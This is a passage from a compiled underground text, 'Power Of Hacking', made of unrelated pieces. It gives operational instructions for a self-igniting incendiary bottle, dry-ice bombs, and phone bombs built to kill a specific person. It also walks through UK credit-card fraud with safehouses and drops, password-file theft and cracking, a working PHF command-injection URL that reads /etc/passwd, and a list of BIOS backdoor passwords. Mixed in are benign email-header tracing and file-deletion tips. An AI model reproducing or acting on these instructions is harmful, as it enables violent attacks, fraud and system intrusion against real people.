Power Of Hacking She MUST give you her name as she connects & all of these calls are bugged. If the SA gives you a rough time get her BOS (Business Office Supervisor) on the line. S/He will almost always back her girls up, but sometimes the SA will get tarred and feathered. The operator reports to the Group Chief, and S/He will solve 100% of your problems, but the chances of getting S/He on the line are nill. If a lineman (the guy who works out on the poles) or an installation man gives you the works ask to speak to the Installation Foreman, that works wonders. Here is some other bell jargon, that might come in handy if you are having trouble with the line. Or they can be used to lie your way out of situations....
An Erling is a line busy for 1 hour, used mostly in traffic studies A Permanent Signal is that terrible howling you get if you disconnect, but don't hang up. Everyone knows what a busy signal is, but some idiots think that is the *Actual* ringing of the phone, when it just is a tone "beeps" when the phone is ringing, wouldn't bet on this though, it can (and does) get out of sync. When you get a busy signal that is 2 times as fast as the normal one, the person you are trying to reach isn't really on the phone, (he might be), it is actually the signal that a trunk line somewhere is busy and they haven't or can't reroute your call. Sometimes you will get a Recording, or if you get nothing at all (Left High & Dry in fone terms) all the recordings are being used and the system is really overused, will probably go down in a little while. This happened when Kennedy was shot, the system just couldn't handle the calls. By the way this is called the "reorder signal" and the trunk line is
Mail:mtahirzahid@yahoo.com
Page 139
Power Of Hacking "blocked". One more thing, if an overseas call isn't completed and doesn't generate any money for AT&T, is is called an "Air & Water Call".
AT&T is no longer as stupid as she once was. I advise STRONG caution when phucking with Ma Bell. Chemical Fire Bottle This incendiary bottle is self-igniting on target impact. Materials Required -----------------How Used
Common Source
Sulphuric Acid
Storage Batteries
Motor Vehicles
Material Processing Industrial Plants Gasoline
Motor Fuel
Gas Station or Motor Vehicles
Potassium Chlorate Sugar
Medicine
Sweetening Foods
Drug Stores Food Store
Glass bottle with stopper (roughly 1 quart size) Small Bottle or jar with lid. Rag or absorbant paper (paper towels, newspaper) String or rubber bands Procedure: --------1) Sulphuric Acid MUST be concentrated. If battery acid or other dilute acid is used, concentrate it by boiling until dense white fumes are given off. Container used to boil should be of enamel-ware or oven glass.
Mail:mtahirzahid@yahoo.com
Page 140
Power Of Hacking CAUTION: Sulphuric Acid will burn skin and destroy clothing. If any is spilled, wash it away with a large quantity of water. Fumes are also VERY dangerous and should not be inhaled. 2) Remove the acid from heat and allow to cool to room temperature. 3) Pour gasoline into the large (1 quart) bottle until it is approximately 1/3 full. 4) Add concentrated sulphuric acid to gasoline slowly until the bottle is filled to within 1" to 2" from top. Place the stopper on the bottle. 5) Wash the outside of the bottle thoroughly with clear water. CAUTION: If this is not done, the fire bottle may be dangerous to handle during use! 6) Wrap a clean cloth or several sheets of absorbant paper around the outside of the bottle. Tie with string or fasten with rubber bands. 7) Dissolve 1/2 cup (100 grams) of potassium chlorate and 1/2 cup (100 grams) of sugar in one cup (250 cc) of boiling water. 8) Allow the solution to cool, pour into the small bottle and cap tightly. The cooled solution should be approx. 2/3 crystals and 1/3 liquid. If there is more than this, pour off excess before using. CAUTION: Store this bottle seperately from the other bottle!
How To Use: ----------
1) Shake the small bottle to mix contents and pour onto the cloth
or paper around the large bottle. Bottle can be used wet or after
Mail:mtahirzahid@yahoo.com
Page 141
Power Of Hacking solution is dried. However, when dry, the sugar-Potassium chlorate mixture is very sensitive to spark or flame and should be handled accordingly. 2) Throw or launch the bottle. When the bottle breaks against a hard surface (target) the fuel will ignite. U.K. CREDIT CARD FRAUD
U.K. credit card fraud is a lot easier than over in the States. The same basic 3 essentials are needed -
1...A safehouse. 2...Credit card numbers with Xp date and address. 3...Good suppliers of next day delivery goods.
1...The Safehouse The safehouse should be on the ground floor, so as not to piss off the delivery man when he comes to drop off your freshly stolen gear. If he has to go up 10 flights in a complete dive and some 14 year old kid signs for an A2000 then he's gonna wonder! Make sure there are no nosey neighbours, a good area is one full of yuppies 'cos they all go to work during daytime. Safehouses are usually obtained by paying a month's rent in advance or putting down a deposit of say, Ĺ&#x201C;200. Either that or break into a place and use that.
2...Credit Card Numbers. The card number, expiry date, start date (if possible), full name (including middle inital), phone number and full address with postcode
Mail:mtahirzahid@yahoo.com
Page 142
Power Of Hacking are ideal. If you can only get the sirname, and no postcode, you shouldn't have any real hassle. Just say you moved recently to your new address. Phone number is handy, if it just rings and rings but if it doesn't, then make sure it's ex-directory. You CANNOT get away with giving them a bullshit phone number. Some fussy companies want phone numbers just to cross-check on CARDNET but generally it's not needed. To recap, here's a quick check-list...
1.Card number and Xpiry date. 2.Name and address of card holder. 3.First name/initials (OPTIONAL) 4.Start date (OPTIONAL) 5.Postcode (OPTIONAL) 6.Phone number (OPTIONAL)
If you have all 6, then you shouldn't have any hassle. Start date is the rarest item you could be asked for, postcode and initals being more common. If you are missing 3-6 then you need one helluva smoothtalking bastard on the phone line!!!!
3...The Ordering Not everyone can order œ1000's of stuff - it's not easy. You have to be cool, smooth and have some good answers to their questions. I advise that you only order up to œ500 worth of stuff in one go, but if you have details 1-6 and the phone number will NOT be answered from 95.30 P.M. then go up to œ1000 (make sure it's a GOLD card!). When
Mail:mtahirzahid@yahoo.com
Page 143
Power Of Hacking getting ready to order make sure you have at least 3 times the amount of suppliers you need e.g.if you want to card 5 hard-drives, make sure you have 15 suppliers. A lot of the time, they are either out stock, can't do next day delivery or won't deliver to a different address. Quick check list of what you must ask before handing over number -
1.Next day delivery, OK? 2.Ordered to different address to card, OK? 3.Do you have item in stock (pretty obvious, eh?)
Make sure you ask ALL of these questions before handing over your precious number.
Excuses... Usual excuses for a different address are that it's a present or you're on business here for the next 5 weeks etc. Any old bullshit why it won't go to the proper address.
WARNING!*******Invoices!*******WARNING! Invoices are sometimes sent out with the actual parcel but they are also sent out to the card owners (why do you think they need the address for?) so using a safehouse for more than 2 days is risky. A 1 day shot is safe, if they catch on then they'll stop the goods before getting a search warrant.
Credit Limits... Limits on cards reach from Ĺ&#x201C;500 to Ĺ&#x201C;4000 on Gold cards. Your average
Mail:mtahirzahid@yahoo.com
Page 144
Power Of Hacking card will be about œ1000-œ1500. It takes a while to build up a good credit rating in order to have large limits so don't think every card will hold 12 IBM 386's! Visa and Access are always used - American Xpress etc. are USELESS.
Access = Eurocard, Mastercard (begins with 5) Visa = (begins with 4, 16 digit is a Gold)
A general rule is, always confirm an order to make sure credit is cleared. As the month goes on, credit is used up - the bad times are from 27th - 3rd which is when all the bills come in. Best time to card is around 11th or 12th, when the poor guy has paid off his last bill so you can run up a new one (he, he, he!).
Ideal items to card...
The best stuff is always computer hard-ware as it's next-day. Amigas, ST's, PC's - anything really. Blank discs are a waste of time, they're too heavy. Xternal drives, monitors - good stuff basically. Don't order any shit like VCR's, hi-fi, video-cameras, music keyboards, computer software, jewerely or anything under œ300. You'll find the listed items are difficult to get next day delivery and usually won't deliver to a different address - bastards, eh? You're wasting your time with little items under œ300, try to keep deliveries under 10 a day.
The drop....
Mail:mtahirzahid@yahoo.com
Page 145
Power Of Hacking Two ways of doing the drop
1.Sign for all the gear (make sure you're there between 9.00 and 5.30 P.M.)
2.Don't turn up till around 6.30 P.M. and collect all the cards that the delivery man has left. These usually say 'you were out at XX time so could you please arrange new time for delivery or pick up from our depot'. In that case, piss off to the depot and get all the gear (need a big car!).
Remember, carding is ILLEGAL kiddies, so don't do it unless you're going to cut me on it!!!! Lockpicking for the EXTREME beginner...
This is really a good method for opening doors that are locked. The only problem with this, though, is that it only works for outward opening doors. Ok, here we go....
1) Realize you are not working with the actual lock, but that thing that sticks between the door and the wall.
2) See how that thing is curved on one side? Well, that is what we will be making use of.
3) Acquire a large paper-clip. If it is too short, it won't work.
Mail:mtahirzahid@yahoo.com
Page 146
Power Of Hacking You have to also have a shoelace. Now, onto the construction...
4) Straighten the paper-clip.
5) Loop one end of the paper clip around the shoelace. The shoelace should be about 4/5 on one side of the clip and 1/5 on the other. Let's see if I can draw it.
------------------************************************* -* *******
--- is the paper clip *** is the shoelace
That's not very good, but I hope you get the picture.
6) All you have to do now is curve the paper clip (no, I won't draw it)
7) With the curved paper-clip, stick it between the door and the wall, behind the metal thing that sticks between.
8) Feed it through with you hand, until you can grip both sides of the shoelace.
9) Now, simply pull the lace and the door at the same time, and VIOLA!
Mail:mtahirzahid@yahoo.com
Page 147
Power Of Hacking the door is open.
I prefer this over regular lock-picking if the door opens outward, because it is a lot quicker. Lock picking can take 5 minutes... When done correctly this only takes 30 seconds! So, if you can, use this.
Fun with dry ice... LOTS of fun with dry ice. ---------------------------------------------
There is no standard formula for a dry ice bomb, however a generic form is as follows:
Take a 2-liter soda bottle, empty it completely, then add about 3/4 Lb of Dry Ice (crushed works best) and (optional) a quantity of water.
Depending on the condition of the bottle, the weather, and the amount and temperature of the bottle the bomb will go off in 30 seconds - 5 minutes. Without any water added, the 2-liter bottles will go often in 3-7 minutes if dropped into a warm river, and in 45 minutes to 1 1/2 hours in open air.
The explosion sounds equivalent to an M-100. _Plastic_ 16 oz. soda bottles and 1 liter bottles work almost as well as do the 2-liters, however glass bottles aren't nearly as loud, and can produce dangerous shrapnel.
Remember, these are LOUD! A classmate of mine set up 10 bottles in a nearby park without adding water. After the first two went off (there
Mail:mtahirzahid@yahoo.com
Page 148
Power Of Hacking was about 10 minutes between explosions) the Police arrived and spent the next hour trying to find the guy who they thought was setting off M-100's all around them...
USES FOR DRY ICE
Time Bombs:
1. Get a small plastic container with lid (we used the small plastic cans that hold the coaters used for large-format Polaroid film). A film canister would probably work; the key is, it should seal tightly and take a fair amount of effort to open). Place a chunk of dry ice in the can, put on the lid without quite sealing it. Put the assembled bomb in your pocket, or behind your back. Approach the mark and engage in normal conversation. When his attention is drawn away, quickly seal the lid on the bomb, deposit it somewhere within a few feet of the mark, out of obvious sight, then leave. Depending on variables (you'll want to experiment first), you'll hear a loud "pop" and an even louder "Aarrggghhh!" within a minute, when the CO2 pressure becomes sufficient to blow off the lid. In a cluttered lab, this is doubly nasty because the mark will proabably never figure out what made the noise.
2. Put 2-3 inches of water in a 2-liter plastic pop bottle. Put in as many chunks of dry ice as possible before the smoke gets too thick. Screw on the cap, place in an appropriate area, and run like hell. After about a minute (your mileage may vary), a huge explosion will result, spraying water
Mail:mtahirzahid@yahoo.com
Page 149
Power Of Hacking everywhere, along with what's left of the 2-liter bottle.
More things to do with Dry Ice:
Has anyone ever thrown dry ice into a public pool? As long as you chuck it into the bottom of the deep end, it's safe, and it's really impressive if the water is warm enough
"Fun stuff. It SCREAMS when it comes into contact with metal..." "You can safely hold a small piece of dry ice in your mouth if you KEEP IT MOVING CONSTANTLY. It looks like you're smoking or on fire."
Editor's Note: Dry ice can be a lot of fun, but be forewarned:
Using anything but plastic to contain dry ice bombs is suicidal. Dry ice is more dangerous than TNT, because it's extremely unpredictable. Even a 2-liter bottle can produce some nasty shrapnel: One source tells me that he caused an explosion with a 2-liter bottle that destroyed a metal garbage can. In addition, it is rumored that several kids have been killed by shards of glass resulting from the use of a glass bottle. For some reason, dry ice bombs have become very popular in the state of Utah. As a result, dry ice bombs have been classified as infernal devices, and possession is a criminal offense.
---PHONE BOMBS
The phone bomb is an explosive device that has been used in the past to kill or injure a specific individual. The basic idea is simple: when the
Mail:mtahirzahid@yahoo.com
Page 150
Power Of Hacking person answers the phone, the bomb explodes. If a small but powerful high explosive device with a squib was placed in the phone receiver, when the current flowed through the receiver, the squib would explode, detonating the high explosive in the person's hand. Nasty. All that has to be done is acquire a squib, and tape the receiver switch down.
Unscrew the mouthpiece cover, and remove the speaker, and connect the squib's leads where it was. Place a high explosive putty, such as C-1 (see section 3.31) in the receiver, and screw the cover on, making sure that the squib is surrounded by the C-1. Hang the phone up, and leave the tape in place.
When the individual to whom the phone belongs attempts to answer the phone, he will notice the tape, and remove it. This will allow current to flow through the squib. Note that the device will not explode by merely making a phone call; the owner of the phone must lift up the receiver, and remove the tape. It is highly probable that the phone will be by his/her ear when the device explodes...
--IMPROVED PHONE BOMB
The above seems overly complicated to me... it would be better to rig the device as follows:
_________
FIRST UNPLUG THE PHONE FROM THE WALL
/|-------|\ Wire the detonator IN LINE with the wires going to the earpiece, ~ | | ~ (may need to wire it with a relay so the detonator can receive @@@@@@@@ the full line power, not just the audio power to the earpiece)
Mail:mtahirzahid@yahoo.com
Page 151
Power Of Hacking @@@@@@@@@@ @@@@@@@@@@ Pack C4 into the phone body (NOT the handset) and plug it back in. When they pick up the phone, power will flow through the circuit to the detonator....
Hacking Webpages
Getting the Password File Through FTP
Ok well one of the easiest ways of getting superuser access is through anonymous ftp access into a webpage. First you need learn a little about the password file...
root:User:d7Bdg:1n2HG2:1127:20:Superuser TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/csh BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh
This is an example of a regular encrypted password file. The Superuser is the part that gives you root. That's the main part of the file.
root:x:0:1:Superuser:/: ftp:x:202:102:Anonymous ftp:/u1/ftp: ftpadmin:x:203:102:ftp Administrator:/u1/ftp
This is another example of a password file, only this one has one little difference, it's shadowed. Shadowed password files don't let you view or copy the actual encrypted password. This causes problems for the password
Mail:mtahirzahid@yahoo.com
Page 152
Power Of Hacking cracker and dictionary maker(both explained later in the text). Below is another example of a shadowed password file:
root:x:0:1:0000-Admin(0000):/:/usr/bin/csh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp: smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh pin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false
Shadowed password files have an "x" in the place of a password or sometimes they are disguised as an * as well.
Now that you know a little more about what the actual password file looks like you should be able to identify a normal encrypted pw from a shadowed pw file. We can now go on to talk about how to crack it.
Cracking a password file isn't as complicated as it would seem, although the
Mail:mtahirzahid@yahoo.com
Page 153
Power Of Hacking files vary from system to system. 1.The first step that you would take is to download or copy the file. 2. The second step is to find a password cracker and a dictionary maker. Although it's nearly impossible to find a good cracker there are a few ok ones out there. I recomend that you look for Cracker Jack, John the Ripper, Brute Force Cracker, or Jack the Ripper. Now for a dictionary maker or a dictionary file... When you start a cracking prog you will be asked to find the the password file. That's where a dictionary maker comes in. You can download one from nearly every hacker page on the net. A dictionary maker finds all the possible letter combinations with the alphabet that you choose(ASCII, caps, lowercase, and numeric letters may also be added) . We will be releasing our pasword file to the public soon, it will be called, Psychotic Candy, "The Perfect Drug." As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it gives you.
The PHF Technique
Well I wasn't sure if I should include this section due to the fact that everybody already knows it and most servers have already found out about the bug and fixed it. But since I have been asked questions about the phf I decided to include it.
The phf technique is by far the easiest way of getting a password file (although it doesn't work 95% of the time). But to do the phf all you do is open a browser and type in the following link:
Mail:mtahirzahid@yahoo.com
Page 154
Power Of Hacking http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
You replace the webpage_goes_here with the domain. So if you were trying to get the pw file for www.webpage.com you would type:
http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
and that's it! You just sit back and copy the file(if it works).
Backtracking EMAIL Messages
Ask most people how they determine who sent them an email message and the response is almost universally, "By the From line." Unfortunately this symptomatic of the current confusion among internet users as to where particular messages come from and who is spreading spam and viruses. The "From" header is little more than a courtesy to the person receiving the message. People spreading spam and viruses are rarely courteous. In short, if there is any question about where a particular email message came from the safe bet is to assume the "From" header is forged.
So how do you determine where a message actually came from? You have to understand how email messages are put together in order to backtrack an email message. SMTP is a text based protocol for transferring messages across the internet. A series of headers are placed in front of the data portion of the message. By examining the headers you can usually backtrack a message to the source network, sometimes the source host. A more detailed essay on reading email headers can be found .
If you are using Outlook or Outlook Express you can view the headers by right clicking on the message and selecting properties or options.
Mail:mtahirzahid@yahoo.com
Page 155
Power Of Hacking Below are listed the headers of an actual spam message I received. I've changed my email address and the name of my server for obvious reasons. I've also double spaced the headers to make them more readable.
Return-Path: <s359dyxtt@yahoo.com>
X-Original-To: davar@example.com
Delivered-To: davar@example.com
Received: from 12-218-172-108.client.mchsi.com (12-218-172-108.client.mchsi.com [12.218.172.108]) by mailhost.example.com (Postfix) with SMTP id 1F9B8511C7 for <davar@example.com>; Sun, 16 Nov 2003 09:50:37 -0800 (PST)
Received: from (HELO 0udjou) [193.12.169.0] by 12-218-172-108.client.mchsi.com with ESMTP id <536806-74276>; Sun, 16 Nov 2003 19:42:31 +0200
Message-ID: <n5-l067n7z$46-z$-n@eo2.32574>
From: "Maricela Paulson" <s359dyxtt@yahoo.com>
Reply-To: "Maricela Paulson" <s359dyxtt@yahoo.com>
To: davar@example.com
Subject: STOP-PAYING For Your PAY-PER-VIEW, Movie Channels, Mature Channels...isha
Mail:mtahirzahid@yahoo.com
Page 156
Power Of Hacking Date: Sun, 16 Nov 2003 19:42:31 +0200
X-Mailer: Internet Mail Service (5.5.2650.21)
X-Priority: 3
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="MIMEStream=_0+211404_90873633350646_4032088448"
According to the From header this message is from Maricela Paulson at s359dyxxt@yahoo.com. I could just fire off a message to abuse@yahoo.com, but that would be waste of time. This message didn't come from yahoo's email service.
The header most likely to be useful in determining the actual source of an email message is the Received header. According to the top-most Received header this message was received from the host 12-218-172-108.client.mchsi.com with the ip address of 21.218.172.108 by my server mailhost.example.com. An important item to consider is at what point in the chain does the email system become untrusted? I consider anything beyond my own email server to be an unreliable source of information. Because this header was generated by my email server it is reasonable for me to accept it at face value.
The next Received header (which is chronologically the first) shows the remote email server accepting the message from the host 0udjou with the ip 193.12.169.0. Those of you who know anything about IP will realize that that is not a valid host IP address. In addition, any hostname that ends in client.mchsi.com is unlikely to be an authorized email server. This has every sign of being a cracked client system.
Here's is where we start digging. By default Windows is somewhat lacking in network diagnostic tools; however, you can use the tools at to do your own checking. Mail:mtahirzahid@yahoo.com
Page 157
Power Of Hacking
davar@nqh9k:[/home/davar] $whois 12.218.172.108
AT&T WorldNet Services ATT (NET-12-0-0-0-1) 12.0.0.0 - 12.255.255.255 Mediacom Communications Corp MEDIACOMCC-12-218-168-0-FLANDREAU-MN (NET-12-218-168-01) 12.218.168.0 - 12.218.175.255
# ARIN WHOIS database, last updated 2003-12-31 19:15 # Enter ? for additional hints on searching ARIN's WHOIS database.
I can also verify the hostname of the remote server by using nslookup, although in this particular instance, my email server has already provided both the IP address and the hostname.
davar@nqh9k:[/home/davar] $nslookup 12.218.172.108
Server: localhost Address: 127.0.0.1
Name: 12-218-172-108.client.mchsi.com Address: 12.218.172.108
Ok, whois shows that Mediacom Communications owns that netblock and nslookup confirms the address to hostname mapping of the remote server,12-218-172-108.client.mchsi.com. If I preface a www in front of the domain name portion and plug that into my web browser, http://www.mchsi.com, I get Mediacom's web site.
There are few things more embarrassing to me than firing off an angry message to someone who is supposedly responsible for a problem, and being wrong. By double checking who owns the remote Mail:mtahirzahid@yahoo.com
Page 158
Power Of Hacking host's IP address using two different tools (whois and nslookup) I minimize the chance of making myself look like an idiot.
A quick glance at the web site and it appears they are an ISP. Now if I copy the entire message including the headers into a new email message and send it to abuse@mchsi.com with a short message explaining the situation, they may do something about it.
But what about Maricela Paulson? There really is no way to determine who sent a message, the best you can hope for is to find out what host sent it. Even in the case of a PGP signed messages there is no guarantee that one particular person actually pressed the send button. Obviously determining who the actual sender of an email message is much more involved than reading the From header. Hopefully this example may be of some use to other forum regulars. Delete An "undeletable" File
Open a Command Prompt window and leave it open. Close all open programs. Click Start, Run and enter TASKMGR.EXE Go to the Processes tab and End Process on Explorer.exe. Leave Task Manager open. Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in. At the command prompt type DEL <filename> where <filename> is the file you wish to delete. Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell. Close Task Manager.
Or you can try this
Open Notepad.exe
Mail:mtahirzahid@yahoo.com
Page 159
Power Of Hacking Click File>Save As..>
locate the folder where ur undeletable file is
Choose 'All files' from the file type box
click once on the file u wanna delete so its name appears in the 'filename' box
put a " at the start and end of the filename (the filename should have the extension of the undeletable file so it will overwrite it)
click save,
It should ask u to overwrite the existing file, choose yes and u can delete it as normal
Here's a manual way of doing it. I'll take this off once you put into your first post zain.
1. Start 2. Run 3. Type: command 4. To move into a directory type: cd c:\*** (The stars stand for your folder) 5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1 6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside. 7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad Mail:mtahirzahid@yahoo.com
Page 160
Power Of Hacking file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension. Google crack search:just type crack: app name
example: crack: flashget 1.6a
http://www.google.com/search?hl=en&lr=&ie=UTF-8&q=crack%3A+flashget+1.6a Google secrets
--------------------------------------------------------------------------------
method 1 ?ww.google.com
put this string in google search:
"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Mail:mtahirzahid@yahoo.com
Page 161
Power Of Hacking "parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
Notice that i am only changing the word after the parent directory, change it to what you want and you will get a lot of stuff.
voila!
method 2 ?ww.google.com
put this string in google search:
?intitle:index.of? mp3
You only need add the name of the song/artist/singer. Example: ?intitle:index.of? mp3 jackson How do I overburn a CD with Nero?
Start Nero
From the action-bar select File and select Preferences.
In the Preferences window, select Expert Features(1) and check the Enable overburn disc-at-once(2).
Mail:mtahirzahid@yahoo.com
Page 162
Power Of Hacking Choose a Maximum CD Length(3) and click OK(4) (*82:59:59 is the maximum value I suggest, but as you can see from the screen capture above I have set mine significantly higher. The reason is because I frequently use 99min 850 MB CD media).
For a more accurate test you can use a nero tool called nero speed test to see how much a specific CD is capable of being overburned . get it here
From the action-bar select File and select Write CD.
A window will appear when you have exceeded expected length, click OK to start the overburn copy.
Remember to set disk to burn Disc at Once, you cannot overburn in Track at Once Mode. How to Bypass BIOS Passwords
BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS
DISCLAIMER This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.
Mail:mtahirzahid@yahoo.com
Page 163
Power Of Hacking Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:
Using a manufacturers backdoor password to access the BIOS
Use password cracking software
Reset the CMOS using the jumpers or solder beads.
Removing the CMOS battery for at least 10 minutes
Overloading the keyboard buffer
Using a professional service
Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.
--------------------------------------------------------------------------------
Backdoor passwords
Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard Mail:mtahirzahid@yahoo.com
Page 164
Power Of Hacking corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.
WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords
Award BIOS backdoor passwords:
ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222 589589 589721 595595 598598
AMI BIOS backdoor passwords:
AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO
PHOENIX BIOS backdoor passwords:
phoenix, PHOENIX, CMOS, BIOS
MISC. COMMON PASSWORDS
ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj
OTHER BIOS PASSWORDS BY MANUFACTURER
Mail:mtahirzahid@yahoo.com
Page 165
Power Of Hacking Manufacturer Password VOBIS & IBM merlin Dell Dell Biostar Biostar Compaq Compaq Enox xo11nE Epox central Freetech Posterie IWill iwill Jetway spooml Packard Bell bell9 QDI QDI Siemens SKY_FOX TMC BIGO Toshiba Toshiba
TOSHIBA BIOS
Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot
IBM APTIVA BIOS
Press both mouse buttons repeatedly during the boot
--------------------------------------------------------------------------------
Mail:mtahirzahid@yahoo.com
Page 166
Power Of Hacking Password cracking software
The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.
Cmos password recovery tools 3.1 !BIOS (get the how-to article) RemPass KILLCMOS
--------------------------------------------------------------------------------
Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings
Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop. Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.
--------------------------------------------------------------------------------
Mail:mtahirzahid@yahoo.com
Page 167
Power Of Hacking Removing the CMOS Battery
The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time. Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.
--------------------------------------------------------------------------------
Overloading the KeyBoard Buffer
On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.
--------------------------------------------------------------------------------
Jumping the Solder Beads on the CMOS
Mail:mtahirzahid@yahoo.com
Page 168
Power Of Hacking
It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.
--------------------------------------------------------------------------------
Using a professional service
If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.
TopInformationSecurityAttackVectors Mail:mtahirzahid@yahoo.com
Page 169
